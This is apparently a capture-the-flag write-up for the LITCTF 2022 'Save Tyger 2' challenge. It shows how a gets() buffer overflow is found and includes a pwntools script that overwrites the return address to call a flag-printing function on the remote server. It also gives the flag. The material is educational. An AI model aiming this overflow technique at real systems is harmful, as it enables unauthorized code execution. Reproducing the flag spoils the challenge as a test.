Rating:

# Save Tyger 2

## Problem Statement
Tyger needs your help again.
Connect with nc litctf.live 31788

https://drive.google.com/uc?export=download&id=1qCSTo01YjzrncT0SZGOTouC4egY_q-PX

## Solution
We used `webshell.picoctf.org` for most of the debugging, and then switched to a local terminal for the final result.

First, we downloaded the zip file in the drive link, and opened it. Viewing the `save_tyger2.c` file, we see a couple of important details:

![save_tyger2 contents](view_st_2.png)

The `cell` function opens the flag and prints it out; we clearly want to call it.
Moreover, in `main` we see a `gets`, which tells us that we want to invoke a buffer overflow.

Specifically, we want to overflow the `buf` array, and inject the address of `cell` after that. To get the location of `cell`, we chose to decompile the
executable in assembly, using `objdump -M intel -d save_tyger2 > dis.asm`. Scrolling to `cell`, we see that the address is `0x0000000000401162`.

![dissassembly](disasm.png)

All that's left to do is inject this address in a buffer overflow:

```py
from pwn import *
r = remote("litctf.live", 31788)
s = 'a'*32 + 'b'*8 + '\x62\x11\x40\x00\x00\x00\x00\x00' # Backwards since stack is read in reverse
r.sendline(s)
r.recvline()
r.recvline()
r.recvline()
print(r.recvline())
# >>> LITCTF{w3_w0nt_l3t_th3m_t4k3_tyg3r_3v3r_4gain}
```

## Answer
`LITCTF{w3_w0nt_l3t_th3m_t4k3_tyg3r_3v3r_4gain}`

Original writeup (https://github.com/CTF-Team-PlusPlusC/LITCTF2022-Writeups/blob/main/save_tyger2/README.md).